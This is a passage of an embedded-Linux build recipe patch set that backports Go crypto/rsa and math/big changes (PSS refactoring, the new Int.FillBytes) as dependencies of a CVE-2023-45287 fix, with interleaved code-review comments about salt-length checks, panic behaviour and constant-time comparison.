+@@ -40,8 +52,9 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ }
+
+ em := make([]byte, emLen)
+- db := em[:emLen-sLen-hLen-2+1+sLen]
+- h := em[emLen-sLen-hLen-2+1+sLen : emLen-1]
++ psLen := emLen - sLen - hLen - 2
++ db := em[:psLen+1+sLen]
++ h := em[psLen+1+sLen : emLen-1]
+
+ // 4. Generate a random octet string salt of length sLen; if sLen = 0,
+ // then salt is the empty string.
+@@ -69,8 +82,8 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ // 8. Let DB = PS || 0x01 || salt; DB is an octet string of length
+ // emLen - hLen - 1.
+
+- db[emLen-sLen-hLen-2] = 0x01
+- copy(db[emLen-sLen-hLen-1:], salt)
++ db[psLen] = 0x01
++ copy(db[psLen+1:], salt)
+
+ // 9. Let dbMask = MGF(H, emLen - hLen - 1).
+ //
+@@ -81,47 +94,57 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ // 11. Set the leftmost 8 * emLen - emBits bits of the leftmost octet in
+ // maskedDB to zero.
+
+- db[0] &= (0xFF >> uint(8*emLen-emBits))
++ db[0] &= 0xff >> (8*emLen - emBits)
+
+ // 12. Let EM = maskedDB || H || 0xbc.
+- em[emLen-1] = 0xBC
++ em[emLen-1] = 0xbc
+
+ // 13. Output EM.
+ return em, nil
+ }
+
+ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
++ // See RFC 8017, Section 9.1.2.
++
++ hLen := hash.Size()
++ if sLen == PSSSaltLengthEqualsHash {
++ sLen = hLen
++ }
++ emLen := (emBits + 7) / 8
++ if emLen != len(em) {
++ return errors.New("rsa: internal error: inconsistent length")
++ }
++
+ // 1. If the length of M is greater than the input limitation for the
+ // hash function (2^61 - 1 octets for SHA-1), output "inconsistent"
+ // and stop.
+ //
+ // 2. Let mHash = Hash(M), an octet string of length hLen.
+- hLen := hash.Size()
+ if hLen != len(mHash) {
+ return ErrVerification
+ }
+
+ // 3. If emLen < hLen + sLen + 2, output "inconsistent" and stop.
+- emLen := (emBits + 7) / 8
+ if emLen < hLen+sLen+2 {
+ return ErrVerification
+ }
+
+ // 4. If the rightmost octet of EM does not have hexadecimal value
+ // 0xbc, output "inconsistent" and stop.
+- if em[len(em)-1] != 0xBC {
++ if em[emLen-1] != 0xbc {
+ return ErrVerification
+ }
+
+ // 5. Let maskedDB be the leftmost emLen - hLen - 1 octets of EM, and
+ // let H be the next hLen octets.
+ db := em[:emLen-hLen-1]
+- h := em[emLen-hLen-1 : len(em)-1]
++ h := em[emLen-hLen-1 : emLen-1]
+
+ // 6. If the leftmost 8 * emLen - emBits bits of the leftmost octet in
+ // maskedDB are not all equal to zero, output "inconsistent" and
+ // stop.
+- if em[0]&(0xFF<<uint(8-(8*emLen-emBits))) != 0 {
++ var bitMask byte = 0xff >> (8*emLen - emBits)
++ if em[0] & ^bitMask != 0 {
+ return ErrVerification
+ }
+
+@@ -132,37 +155,30 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+
+ // 9. Set the leftmost 8 * emLen - emBits bits of the leftmost octet in DB
+ // to zero.
+- db[0] &= (0xFF >> uint(8*emLen-emBits))
++ db[0] &= bitMask
+
++ // If we don't know the salt length, look for the 0x01 delimiter.
+ if sLen == PSSSaltLengthAuto {
+- FindSaltLength:
+- for sLen = emLen - (hLen + 2); sLen >= 0; sLen-- {
+- switch db[emLen-hLen-sLen-2] {
+- case 1:
+- break FindSaltLength
+- case 0:
+- continue
+- default:
+- return ErrVerification
+- }
+- }
+- if sLen < 0 {
++ psLen := bytes.IndexByte(db, 0x01)
++ if psLen < 0 {
+ return ErrVerification
+ }
+- } else {
+- // 10. If the emLen - hLen - sLen - 2 leftmost octets of DB are not zero
+- // or if the octet at position emLen - hLen - sLen - 1 (the leftmost
+- // position is "position 1") does not have hexadecimal value 0x01,
+- // output "inconsistent" and stop.
+- for _, e := range db[:emLen-hLen-sLen-2] {
+- if e != 0x00 {
+- return ErrVerification
+- }
+- }
+- if db[emLen-hLen-sLen-2] != 0x01 {
++ sLen = len(db) - psLen - 1
++ }
++
++ // 10. If the emLen - hLen - sLen - 2 leftmost octets of DB are not zero
++ // or if the octet at position emLen - hLen - sLen - 1 (the leftmost
++ // position is "position 1") does not have hexadecimal value 0x01,
++ // output "inconsistent" and stop.
++ psLen := emLen - hLen - sLen - 2
++ for _, e := range db[:psLen] {
++ if e != 0x00 {
+ return ErrVerification
+ }
+ }
++ if db[psLen] != 0x01 {
++ return ErrVerification
++ }
+
+ // 11. Let salt be the last sLen octets of DB.
+ salt := db[len(db)-sLen:]
+@@ -181,19 +197,19 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ h0 := hash.Sum(nil)
+
+ // 14. If H = H', output "consistent." Otherwise, output "inconsistent."
+- if !bytes.Equal(h0, h) {
++ if !bytes.Equal(h0, h) { // TODO: constant time?
+ return ErrVerification
+ }
+ return nil
+ }
+
+-// signPSSWithSalt calculates the signature of hashed using PSS [1] with specified salt.
++// signPSSWithSalt calculates the signature of hashed using PSS with specified salt.
+ // Note that hashed must be the result of hashing the input message using the
+ // given hash function. salt is a random sequence of bytes whose length will be
+ // later used to verify the signature.
+ func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) (s []byte, err error) {
+- nBits := priv.N.BitLen()
+- em, err := emsaPSSEncode(hashed, nBits-1, salt, hash.New())
++ emBits := priv.N.BitLen() - 1
++ em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
+ if err != nil {
+ return
+ }
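Review bot: The added `// TODO: constant time?` on the `bytes.Equal(h0, h)` comparison leaves open a question that can be answered in place. In verification `h` is recovered from the signature with the public key and `h0` is computed from the caller's digest and the recovered salt, so a variable-time comparison reveals nothing secret as long as the digest itself is not confidential. I would replace the TODO with `// Not constant time: both values derive from public inputs.` so later readers do not take it for an unfixed timing issue. emsaPSSVerify begins before this hunk.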
+@@ -202,7 +218,7 @@ func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed,
+ if err != nil {
+ return
+ }
+- s = make([]byte, (nBits+7)/8)
++ s = make([]byte, priv.Size())
+ copyWithLeftPad(s, c.Bytes())
+ return
+ }
+@@ -223,16 +239,15 @@ type PSSOptions struct {
+ // PSSSaltLength constants.
+ SaltLength int
+
+- // Hash, if not zero, overrides the hash function passed to SignPSS.
+- // This is the only way to specify the hash function when using the
+- // crypto.Signer interface.
++ // Hash is the hash function used to generate the message digest. If not
++ // zero, it overrides the hash function passed to SignPSS. It's required
++ // when using PrivateKey.Sign.
+ Hash crypto.Hash
+ }
+
+-// HashFunc returns pssOpts.Hash so that PSSOptions implements
+-// crypto.SignerOpts.
+-func (pssOpts *PSSOptions) HashFunc() crypto.Hash {
+- return pssOpts.Hash
++// HashFunc returns opts.Hash so that PSSOptions implements crypto.SignerOpts.
++func (opts *PSSOptions) HashFunc() crypto.Hash {
++ return opts.Hash
+ }
+
+ func (opts *PSSOptions) saltLength() int {
+@@ -242,56 +257,50 @@ func (opts *PSSOptions) saltLength() int {
+ return opts.SaltLength
+ }
+
+-// SignPSS calculates the signature of hashed using RSASSA-PSS [1].
+-// Note that hashed must be the result of hashing the input message using the
+-// given hash function. The opts argument may be nil, in which case sensible
+-// defaults are used.
+-func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []byte, opts *PSSOptions) ([]byte, error) {
++// SignPSS calculates the signature of digest using PSS.
++//
++// digest must be the result of hashing the input message using the given hash
++// function. The opts argument may be nil, in which case sensible defaults are
++// used. If opts.Hash is set, it overrides hash.
++func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte, opts *PSSOptions) ([]byte, error) {
++ if opts != nil && opts.Hash != 0 {
++ hash = opts.Hash
++ }
++
+ saltLength := opts.saltLength()
+ switch saltLength {
+ case PSSSaltLengthAuto:
+- saltLength = (priv.N.BitLen()+7)/8 - 2 - hash.Size()
++ saltLength = priv.Size() - 2 - hash.Size()
+ case PSSSaltLengthEqualsHash:
+ saltLength = hash.Size()
+ }
+
+- if opts != nil && opts.Hash != 0 {
+- hash = opts.Hash
+- }
+-
+ salt := make([]byte, saltLength)
+ if _, err := io.ReadFull(rand, salt); err != nil {
+ return nil, err
+ }
+- return signPSSWithSalt(rand, priv, hash, hashed, salt)
++ return signPSSWithSalt(rand, priv, hash, digest, salt)
+ }
+
+ // VerifyPSS verifies a PSS signature.
+-// hashed is the result of hashing the input message using the given hash
+-// function and sig is the signature. A valid signature is indicated by
+-// returning a nil error. The opts argument may be nil, in which case sensible
+-// defaults are used.
+-func VerifyPSS(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte, opts *PSSOptions) error {
+- return verifyPSS(pub, hash, hashed, sig, opts.saltLength())
+-}
+-
+-// verifyPSS verifies a PSS signature with the given salt length.
+-func verifyPSS(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte, saltLen int) error {
+- nBits := pub.N.BitLen()
+- if len(sig) != (nBits+7)/8 {
++//
++// A valid signature is indicated by returning a nil error. digest must be the
++// result of hashing the input message using the given hash function. The opts
++// argument may be nil, in which case sensible defaults are used. opts.Hash is
++// ignored.
++func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts *PSSOptions) error {
++ if len(sig) != pub.Size() {
+ return ErrVerification
+ }
+ s := new(big.Int).SetBytes(sig)
+ m := encrypt(new(big.Int), pub, s)
+- emBits := nBits - 1
++ emBits := pub.N.BitLen() - 1
+ emLen := (emBits + 7) / 8
+- if emLen < len(m.Bytes()) {
++ emBytes := m.Bytes()
++ if emLen < len(emBytes) {
+ return ErrVerification
+ }
+ em := make([]byte, emLen)
+- copyWithLeftPad(em, m.Bytes())
+- if saltLen == PSSSaltLengthEqualsHash {
+- saltLen = hash.Size()
+- }
+- return emsaPSSVerify(hashed, em, emBits, saltLen, hash.New())
++ copyWithLeftPad(em, emBytes)
++ return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
+ }
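Review bot: In SignPSS nothing checks `saltLength` before `salt := make([]byte, saltLength)`, so a negative value panics instead of returning an error. With `PSSSaltLengthAuto`, `priv.Size() - 2 - hash.Size()` goes negative when the modulus is small relative to the digest, and a caller-supplied negative `SaltLength` other than the two constants falls through the switch unchanged. A guard after the switch, `if saltLength < 0 { return nil, ErrMessageTooLong }` (or another error the package already exports), keeps signing with an undersized key a recoverable failure. The later CVE-2023-45287-pre3 patch rewrites the Auto line but, in the part visible here, adds no such guard.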
+diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
+index 5a42990640164..b4bfa13defbdf 100644
+--- a/src/crypto/rsa/rsa.go
++++ b/src/crypto/rsa/rsa.go
+@@ -2,7 +2,7 @@
+ // Use of this source code is governed by a BSD-style
+ // license that can be found in the LICENSE file.
+
+-// Package rsa implements RSA encryption as specified in PKCS#1.
++// Package rsa implements RSA encryption as specified in PKCS#1 and RFC 8017.
+ //
+ // RSA is a single, fundamental operation that is used in this package to
+ // implement either public-key encryption or public-key signatures.
+@@ -10,13 +10,13 @@
+ // The original specification for encryption and signatures with RSA is PKCS#1
+ // and the terms "RSA encryption" and "RSA signatures" by default refer to
+ // PKCS#1 version 1.5. However, that specification has flaws and new designs
+-// should use version two, usually called by just OAEP and PSS, where
++// should use version 2, usually called by just OAEP and PSS, where
+ // possible.
+ //
+ // Two sets of interfaces are included in this package. When a more abstract
+ // interface isn't necessary, there are functions for encrypting/decrypting
+ // with v1.5/OAEP and signing/verifying with v1.5/PSS. If one needs to abstract
+-// over the public-key primitive, the PrivateKey struct implements the
++// over the public key primitive, the PrivateKey type implements the
+ // Decrypter and Signer interfaces from the crypto package.
+ //
+ // The RSA operations in this package are not implemented using constant-time algorithms.
+@@ -111,7 +111,8 @@ func (priv *PrivateKey) Public() crypto.PublicKey {
+
+ // Sign signs digest with priv, reading randomness from rand. If opts is a
+ // *PSSOptions then the PSS algorithm will be used, otherwise PKCS#1 v1.5 will
+-// be used.
++// be used. digest must be the result of hashing the input message using
++// opts.HashFunc().
+ //
+ // This method implements crypto.Signer, which is an interface to support keys
+ // where the private part is kept in, for example, a hardware module. Common
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch
new file mode 100644
index 0000000000..1327b44545
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch
@@ -0,0 +1,401 @@
+From c9d5f60eaa4450ccf1ce878d55b4c6a12843f2f3 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Mon, 27 Apr 2020 21:52:38 -0400
+Subject: [PATCH] math/big: add (*Int).FillBytes
+
+Replaced almost every use of Bytes with FillBytes.
+
+Note that the approved proposal was for
+
+ func (*Int) FillBytes(buf []byte)
+
+while this implements
+
+ func (*Int) FillBytes(buf []byte) []byte
+
+because the latter was far nicer to use in all callsites.
+
+Fixes #35833
+
+Change-Id: Ia912df123e5d79b763845312ea3d9a8051343c0a
+Reviewed-on: https://go-review.googlesource.com/c/go/+/230397
+Reviewed-by: Robert Griesemer <gri@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c9d5f60eaa4450ccf1ce878d55b4c6a12843f2f3]
+CVE: CVE-2023-45287 #Dependency Patch2
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/elliptic/elliptic.go | 13 ++++----
+ src/crypto/rsa/pkcs1v15.go | 20 +++---------
+ src/crypto/rsa/pss.go | 17 +++++------
+ src/crypto/rsa/rsa.go | 32 +++----------------
+ src/crypto/tls/key_schedule.go | 7 ++---
+ src/crypto/x509/sec1.go | 7 ++---
+ src/math/big/int.go | 15 +++++++++
+ src/math/big/int_test.go | 54 +++++++++++++++++++++++++++++++++
+ src/math/big/nat.go | 15 ++++++---
+ 9 files changed, 106 insertions(+), 74 deletions(-)
+
+diff --git a/src/crypto/elliptic/elliptic.go b/src/crypto/elliptic/elliptic.go
+index e2f71cdb63bab..bd5168c5fd842 100644
+--- a/src/crypto/elliptic/elliptic.go
++++ b/src/crypto/elliptic/elliptic.go
+@@ -277,7 +277,7 @@ var mask = []byte{0xff, 0x1, 0x3, 0x7, 0xf, 0x1f, 0x3f, 0x7f}
+ func GenerateKey(curve Curve, rand io.Reader) (priv []byte, x, y *big.Int, err error) {
+ N := curve.Params().N
+ bitSize := N.BitLen()
+- byteLen := (bitSize + 7) >> 3
++ byteLen := (bitSize + 7) / 8
+ priv = make([]byte, byteLen)
+
+ for x == nil {
+@@ -304,15 +304,14 @@ func GenerateKey(curve Curve, rand io.Reader) (priv []byte, x, y *big.Int, err e
+
+ // Marshal converts a point into the uncompressed form specified in section 4.3.6 of ANSI X9.62.
+ func Marshal(curve Curve, x, y *big.Int) []byte {
+- byteLen := (curve.Params().BitSize + 7) >> 3
++ byteLen := (curve.Params().BitSize + 7) / 8
+
+ ret := make([]byte, 1+2*byteLen)
+ ret[0] = 4 // uncompressed point
+
+- xBytes := x.Bytes()
+- copy(ret[1+byteLen-len(xBytes):], xBytes)
+- yBytes := y.Bytes()
+- copy(ret[1+2*byteLen-len(yBytes):], yBytes)
++ x.FillBytes(ret[1 : 1+byteLen])
++ y.FillBytes(ret[1+byteLen : 1+2*byteLen])
++
+ return ret
+ }
+
+@@ -320,7 +319,7 @@ func Marshal(curve Curve, x, y *big.Int) []byte {
+ // It is an error if the point is not in uncompressed form or is not on the curve.
+ // On error, x = nil.
+ func Unmarshal(curve Curve, data []byte) (x, y *big.Int) {
+- byteLen := (curve.Params().BitSize + 7) >> 3
++ byteLen := (curve.Params().BitSize + 7) / 8
+ if len(data) != 1+2*byteLen {
+ return
+ }
+diff --git a/src/crypto/rsa/pkcs1v15.go b/src/crypto/rsa/pkcs1v15.go
+index 499242ffc5b57..3208119ae1ff4 100644
+--- a/src/crypto/rsa/pkcs1v15.go
++++ b/src/crypto/rsa/pkcs1v15.go
+@@ -61,8 +61,7 @@ func EncryptPKCS1v15(rand io.Reader, pub *PublicKey, msg []byte) ([]byte, error)
+ m := new(big.Int).SetBytes(em)
+ c := encrypt(new(big.Int), pub, m)
+
+- copyWithLeftPad(em, c.Bytes())
+- return em, nil
++ return c.FillBytes(em), nil
+ }
+
+ // DecryptPKCS1v15 decrypts a plaintext using RSA and the padding scheme from PKCS#1 v1.5.
+@@ -150,7 +149,7 @@ func decryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) (valid
+ return
+ }
+
+- em = leftPad(m.Bytes(), k)
++ em = m.FillBytes(make([]byte, k))
+ firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+ secondByteIsTwo := subtle.ConstantTimeByteEq(em[1], 2)
+
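Review bot: Replacing `leftPad(m.Bytes(), k)` with `m.FillBytes(make([]byte, k))` changes the failure mode: leftPad silently truncated an oversized value, whereas FillBytes, as added to math/big/int.go by this patch, panics when the value does not fit. That is safe only while `m` is always below the modulus, which depends on decrypt and encrypt reducing mod N, and those are not visible in these hunks. The same substitution appears in the VerifyPKCS1v15 hunk and in DecryptOAEP in rsa.go, while VerifyPSS checks `m.BitLen() > emLen*8` first. A one-line comment at each unguarded site, such as `// m < N, so it always fits in k bytes`, would record the invariant the panic-free path relies on. decryptPKCS1v15 extends beyond the hunk on both sides.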
+@@ -256,8 +255,7 @@ func SignPKCS1v15(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []b
+ return nil, err
+ }
+
+- copyWithLeftPad(em, c.Bytes())
+- return em, nil
++ return c.FillBytes(em), nil
+ }
+
+ // VerifyPKCS1v15 verifies an RSA PKCS#1 v1.5 signature.
+@@ -286,7 +284,7 @@ func VerifyPKCS1v15(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte)
+
+ c := new(big.Int).SetBytes(sig)
+ m := encrypt(new(big.Int), pub, c)
+- em := leftPad(m.Bytes(), k)
++ em := m.FillBytes(make([]byte, k))
+ // EM = 0x00 || 0x01 || PS || 0x00 || T
+
+ ok := subtle.ConstantTimeByteEq(em[0], 0)
+@@ -323,13 +321,3 @@ func pkcs1v15HashInfo(hash crypto.Hash, inLen int) (hashLen int, prefix []byte,
+ }
+ return
+ }
+-
+-// copyWithLeftPad copies src to the end of dest, padding with zero bytes as
+-// needed.
+-func copyWithLeftPad(dest, src []byte) {
+- numPaddingBytes := len(dest) - len(src)
+- for i := 0; i < numPaddingBytes; i++ {
+- dest[i] = 0
+- }
+- copy(dest[numPaddingBytes:], src)
+-}
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index f9844d87329a8..b2adbedb28fa8 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -207,20 +207,19 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ // Note that hashed must be the result of hashing the input message using the
+ // given hash function. salt is a random sequence of bytes whose length will be
+ // later used to verify the signature.
+-func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) (s []byte, err error) {
++func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
+ emBits := priv.N.BitLen() - 1
+ em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
+ if err != nil {
+- return
++ return nil, err
+ }
+ m := new(big.Int).SetBytes(em)
+ c, err := decryptAndCheck(rand, priv, m)
+ if err != nil {
+- return
++ return nil, err
+ }
+- s = make([]byte, priv.Size())
+- copyWithLeftPad(s, c.Bytes())
+- return
++ s := make([]byte, priv.Size())
++ return c.FillBytes(s), nil
+ }
+
+ const (
+@@ -296,11 +295,9 @@ func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts
+ m := encrypt(new(big.Int), pub, s)
+ emBits := pub.N.BitLen() - 1
+ emLen := (emBits + 7) / 8
+- emBytes := m.Bytes()
+- if emLen < len(emBytes) {
++ if m.BitLen() > emLen*8 {
+ return ErrVerification
+ }
+- em := make([]byte, emLen)
+- copyWithLeftPad(em, emBytes)
++ em := m.FillBytes(make([]byte, emLen))
+ return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
+ }
+diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
+index b4bfa13defbdf..28eb5926c1a54 100644
+--- a/src/crypto/rsa/rsa.go
++++ b/src/crypto/rsa/rsa.go
+@@ -416,16 +416,9 @@ func EncryptOAEP(hash hash.Hash, random io.Reader, pub *PublicKey, msg []byte, l
+ m := new(big.Int)
+ m.SetBytes(em)
+ c := encrypt(new(big.Int), pub, m)
+- out := c.Bytes()
+
+- if len(out) < k {
+- // If the output is too small, we need to left-pad with zeros.
+- t := make([]byte, k)
+- copy(t[k-len(out):], out)
+- out = t
+- }
+-
+- return out, nil
++ out := make([]byte, k)
++ return c.FillBytes(out), nil
+ }
+
+ // ErrDecryption represents a failure to decrypt a message.
+@@ -597,12 +590,9 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+ lHash := hash.Sum(nil)
+ hash.Reset()
+
+- // Converting the plaintext number to bytes will strip any
+- // leading zeros so we may have to left pad. We do this unconditionally
+- // to avoid leaking timing information. (Although we still probably
+- // leak the number of leading zeros. It's not clear that we can do
+- // anything about this.)
+- em := leftPad(m.Bytes(), k)
++ // We probably leak the number of leading zeros.
++ // It's not clear that we can do anything about this.
++ em := m.FillBytes(make([]byte, k))
+
+ firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+
+@@ -643,15 +633,3 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+
+ return rest[index+1:], nil
+ }
+-
+-// leftPad returns a new slice of length size. The contents of input are right
+-// aligned in the new slice.
+-func leftPad(input []byte, size int) (out []byte) {
+- n := len(input)
+- if n > size {
+- n = size
+- }
+- out = make([]byte, size)
+- copy(out[len(out)-n:], input)
+- return
+-}
+diff --git a/src/crypto/tls/key_schedule.go b/src/crypto/tls/key_schedule.go
+index 2aab323202f7d..314016979afb8 100644
+--- a/src/crypto/tls/key_schedule.go
++++ b/src/crypto/tls/key_schedule.go
+@@ -173,11 +173,8 @@ func (p *nistParameters) SharedKey(peerPublicKey []byte) []byte {
+ }
+
+ xShared, _ := curve.ScalarMult(x, y, p.privateKey)
+- sharedKey := make([]byte, (curve.Params().BitSize+7)>>3)
+- xBytes := xShared.Bytes()
+- copy(sharedKey[len(sharedKey)-len(xBytes):], xBytes)
+-
+- return sharedKey
++ sharedKey := make([]byte, (curve.Params().BitSize+7)/8)
++ return xShared.FillBytes(sharedKey)
+ }
+
+ type x25519Parameters struct {
+diff --git a/src/crypto/x509/sec1.go b/src/crypto/x509/sec1.go
+index 0bfb90cd5464a..52c108ff1d624 100644
+--- a/src/crypto/x509/sec1.go
++++ b/src/crypto/x509/sec1.go
+@@ -52,13 +52,10 @@ func MarshalECPrivateKey(key *ecdsa.PrivateKey) ([]byte, error) {
+ // marshalECPrivateKey marshals an EC private key into ASN.1, DER format and
+ // sets the curve ID to the given OID, or omits it if OID is nil.
+ func marshalECPrivateKeyWithOID(key *ecdsa.PrivateKey, oid asn1.ObjectIdentifier) ([]byte, error) {
+- privateKeyBytes := key.D.Bytes()
+- paddedPrivateKey := make([]byte, (key.Curve.Params().N.BitLen()+7)/8)
+- copy(paddedPrivateKey[len(paddedPrivateKey)-len(privateKeyBytes):], privateKeyBytes)
+-
++ privateKey := make([]byte, (key.Curve.Params().N.BitLen()+7)/8)
+ return asn1.Marshal(ecPrivateKey{
+ Version: 1,
+- PrivateKey: paddedPrivateKey,
++ PrivateKey: key.D.FillBytes(privateKey),
+ NamedCurveOID: oid,
+ PublicKey: asn1.BitString{Bytes: elliptic.Marshal(key.Curve, key.X, key.Y)},
+ })
+diff --git a/src/math/big/int.go b/src/math/big/int.go
+index 8816cf5266cc4..65f32487b58c0 100644
+--- a/src/math/big/int.go
++++ b/src/math/big/int.go
+@@ -447,11 +447,26 @@ func (z *Int) SetBytes(buf []byte) *Int {
+ }
+
+ // Bytes returns the absolute value of x as a big-endian byte slice.
++//
++// To use a fixed length slice, or a preallocated one, use FillBytes.
+ func (x *Int) Bytes() []byte {
+ buf := make([]byte, len(x.abs)*_S)
+ return buf[x.abs.bytes(buf):]
+ }
+
++// FillBytes sets buf to the absolute value of x, storing it as a zero-extended
++// big-endian byte slice, and returns buf.
++//
++// If the absolute value of x doesn't fit in buf, FillBytes will panic.
++func (x *Int) FillBytes(buf []byte) []byte {
++ // Clear whole buffer. (This gets optimized into a memclr.)
++ for i := range buf {
++ buf[i] = 0
++ }
++ x.abs.bytes(buf)
++ return buf
++}
++
+ // BitLen returns the length of the absolute value of x in bits.
+ // The bit length of 0 is 0.
+ func (x *Int) BitLen() int {
+diff --git a/src/math/big/int_test.go b/src/math/big/int_test.go
+index e3a1587b3f0ad..3c8557323a032 100644
+--- a/src/math/big/int_test.go
++++ b/src/math/big/int_test.go
+@@ -1840,3 +1840,57 @@ func BenchmarkDiv(b *testing.B) {
+ })
+ }
+ }
++
++func TestFillBytes(t *testing.T) {
++ checkResult := func(t *testing.T, buf []byte, want *Int) {
++ t.Helper()
++ got := new(Int).SetBytes(buf)
++ if got.CmpAbs(want) != 0 {
++ t.Errorf("got 0x%x, want 0x%x: %x", got, want, buf)
++ }
++ }
++ panics := func(f func()) (panic bool) {
++ defer func() { panic = recover() != nil }()
++ f()
++ return
++ }
++
++ for _, n := range []string{
++ "0",
++ "1000",
++ "0xffffffff",
++ "-0xffffffff",
++ "0xffffffffffffffff",
++ "0x10000000000000000",
++ "0xabababababababababababababababababababababababababa",
++ "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
++ } {
++ t.Run(n, func(t *testing.T) {
++ t.Logf(n)
++ x, ok := new(Int).SetString(n, 0)
++ if !ok {
++ panic("invalid test entry")
++ }
++
++ // Perfectly sized buffer.
++ byteLen := (x.BitLen() + 7) / 8
++ buf := make([]byte, byteLen)
++ checkResult(t, x.FillBytes(buf), x)
++
++ // Way larger, checking all bytes get zeroed.
++ buf = make([]byte, 100)
++ for i := range buf {
++ buf[i] = 0xff
++ }
++ checkResult(t, x.FillBytes(buf), x)
++
++ // Too small.
++ if byteLen > 0 {
++ buf = make([]byte, byteLen-1)
++ if !panics(func() { x.FillBytes(buf) }) {
++ t.Errorf("expected panic for small buffer and value %x", x)
++ }
++ }
++ })
++ }
++}
+diff --git a/src/math/big/nat.go b/src/math/big/nat.go
+index c31ec5156b81d..6a3989bf9d82b 100644
+--- a/src/math/big/nat.go
++++ b/src/math/big/nat.go
+@@ -1476,19 +1476,26 @@ func (z nat) expNNMontgomery(x, y, m nat) nat {
+ }
+
+ // bytes writes the value of z into buf using big-endian encoding.
+-// len(buf) must be >= len(z)*_S. The value of z is encoded in the
+-// slice buf[i:]. The number i of unused bytes at the beginning of
+-// buf is returned as result.
++// The value of z is encoded in the slice buf[i:]. If the value of z
++// cannot be represented in buf, bytes panics. The number i of unused
++// bytes at the beginning of buf is returned as result.
+ func (z nat) bytes(buf []byte) (i int) {
+ i = len(buf)
+ for _, d := range z {
+ for j := 0; j < _S; j++ {
+ i--
+- buf[i] = byte(d)
++ if i >= 0 {
++ buf[i] = byte(d)
++ } else if byte(d) != 0 {
++ panic("math/big: buffer too small to fit value")
++ }
+ d >>= 8
+ }
+ }
+
++ if i < 0 {
++ i = 0
++ }
+ for i < len(buf) && buf[i] == 0 {
+ i++
+ }
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch
new file mode 100644
index 0000000000..ae9fcc170c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch
@@ -0,0 +1,86 @@
+From 8f676144ad7b7c91adb0c6e1ec89aaa6283c6807 Mon Sep 17 00:00:00 2001
+From: Himanshu Kishna Srivastava <28himanshu@gmail.com>
+Date: Tue, 16 Mar 2021 22:37:46 +0530
+Subject: [PATCH] crypto/rsa: fix salt length calculation with
+ PSSSaltLengthAuto
+
+When PSSSaltLength is set, the maximum salt length must equal:
+
+ (modulus_key_size - 1 + 7)/8 - hash_length - 2
+and for example, with a 4096 bit modulus key, and a SHA-1 hash,
+it should be:
+
+ (4096 -1 + 7)/8 - 20 - 2 = 490
+Previously we'd encounter this error:
+
+ crypto/rsa: key size too small for PSS signature
+
+Fixes #42741
+
+Change-Id: I18bb82c41c511d564b3f4c443f4b3a38ab010ac5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/302230
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+Trust: Emmanuel Odeke <emmanuel@orijtech.com>
+Run-TryBot: Emmanuel Odeke <emmanuel@orijtech.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/8f676144ad7b7c91adb0c6e1ec89aaa6283c6807]
+CVE: CVE-2023-45287 #Dependency Patch3
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/pss.go | 2 +-
+ src/crypto/rsa/pss_test.go | 20 +++++++++++++++++++-
+ 2 files changed, 20 insertions(+), 2 deletions(-)
+
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index b2adbedb28fa8..814522de8181f 100644
